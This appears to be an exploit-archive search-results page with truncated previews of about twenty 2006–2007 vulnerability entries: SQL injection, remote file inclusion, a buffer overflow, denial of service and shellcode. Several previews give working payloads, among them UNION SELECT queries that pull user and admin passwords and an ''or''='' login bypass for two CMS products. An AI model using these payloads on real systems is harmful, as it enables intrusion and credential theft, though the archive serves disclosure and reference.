210 matches found
AKLINK-SA-2007-002.txt
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================ ||| Security Advisory AKLINK-SA-2007-002 ||| ||| CVE-2007-1363 CVE candidate ||| ||| CVE-2007-1364 CVE candidate ||| ============================================ DropAFew - Multiple vulnerabilities SQL...
phpfusion-sql.txt
PHP-FUSION Arcade Module cid Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoron.biz -------------------------------- Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/ --------------------------------...
WebLog - 'index.php' Remote File Disclosure
.-""""""""-. / Dj7xpl \ | | |, .-. .-. ,| | o/ \o | |/ /\ | @ ^^ \|IIIIII|/ @8@8 / \ / @ +Iranian Are The Best In World+ Portal : weblog Download : http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoftpagefive Author : Dj7xpl | [email protected] Dork : "C by CyberTeddy" Class :...
WebBuilder 2.0 - StageLoader.php Remote File Inclusion
WebBuilder 2.0 - StageLoader.php Remote File Inclusion -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= WebBuilder = 2.0 Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovere...
LocazoList 2.01a beta5 - 'subcatID' SQL Injection
Title : LocazoList = v2.01a beta5 subcatID Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.locazo.net:81 Dork : "Powered by Locazolist Copyright © 2006" $$ : $100 SQL---------------------------------------------------------...
x-news 1.1 - users.txt Remote Password Disclosure
x-news 1.1 - users.txt Remote Password Disclosure x-news 1.1 Password Disclosure Vulnerability Affected Software: x-news 1.1 x-news Website: http://xqus.com Bugfounder: bd0rk Website: www.soh-crew.it.tt Contact: bd0rkathackermail.com Greetings: str0ke, Perle, TheJT, ajann +Exploit:...
uPhotoGallery 1.1 - Slideshow.asp?ci SQL Injection
uPhotoGallery 1.1 - Slideshow.asp?ci SQL Injection source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allo...
2020 Real Estate 3.2 - listings.asp SQL Injection
2020 Real Estate 3.2 - listings.asp SQL Injection source: https://www.securityfocus.com/bid/21036/info 20/20 Real Estate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
UltraCMS 0.9 sql injection
Tunis the 18 October 2006 bug found by fireboy product:UltraCMS 0.9 there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges. exploit: user: 'or''=' pass: 'or''=' example : http://www.target.com/include/index.php thx...
KICS CMS sql injection
Tunis the 18/10/2006 bug found by fireboy product:KICS CMS vendor:http://www.kinesis.com.au/ there is an sql injection problem in KICS CMS login page and it can be exploited to gain admin privileges. exploit: user: 'or''=' pass: 'or''=' example:http://www.target.com/kicscms/index.asp thx...
WikyBlog 1.2.x - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/20350/info WikyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also...
Techno Dreams Articles & Papers 2.0 Remote SQL Injection Vulnerability
No description provided by source. Title : Articles&Papers Package =v2.0ArticlesTableview.asp Remote SQL Injection Vulnerability Author : ajann Script Page : http://www.t-dreams.com Exploit; http://target/path/ArticlesTableview.asp?key='SQL HERE Example:...
Sponge News <= 2.2 (sndir) Remote File Include Vulnerability
No description provided by source. ============================================================================================== Sponge News = v2.2 sndir Remote File Inclusion Exploit =============================================================================================== Critical Level :...
SmartSite CMS 1.0 - root Multiple Remote File Inclusions
SmartSite CMS 1.0 - root Multiple Remote File Inclusions smartsite cms v1.0 Multiple Remote File include ------------------------------------------------- Discovered By CrAshoVeRrIdE Arabian Security Team ------------------------------------------------- site of script:www.smartsitecms.net...
Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== Scout Portal Toolkit = 1.4.0 forumid Remote SQL Injection Exploit ==================================================================== !/usr/bin/perl...
PrideForum 1.0 - forum.asp SQL Injection
PrideForum 1.0 - forum.asp SQL Injection Title : PrideForum 1.0 forum.asp Remote SQL Injection Vulnerability Author : ajann Exploit Example: http://target/path/forum.asp?HID=1%20union+select+0,0,ID,JUser,0,0,0,JPass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt milw0rm.com 2006-05-27...
PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "\r\n"; echo " PHPSurveyor = 0.995 'save.php/surveyid' remote cmmnds xctn \r\n"; echo " by rgod [email protected] site: http://retrogod.altervista.org \r\n"; echo " a special tnX goes to Frozen for his dork! \r\n"; ech...
PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit
No description provided by source. / GNU PeerCast = v0.1216 Remote Exploit ====================================== PeerCast is a simple, free way to listen to radio and watch video on the internet. A remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which can be...
UnrealIRCd 3.x - Remote Denial of Service
UnrealIRCd 3.x - Remote Denial of Service source: https://www.securityfocus.com/bid/17057/info UnrealIRCd is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. !/usr/bin/perl Denial of Service exploit for UnrealIRCd...
linux/x86 normal exit w/ random (so to speak) return value 5 bytes
Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 normal exit w/ random so to speak return value 5 bytes ================================================================== / linux/x86 normal exit w/ random so to speak...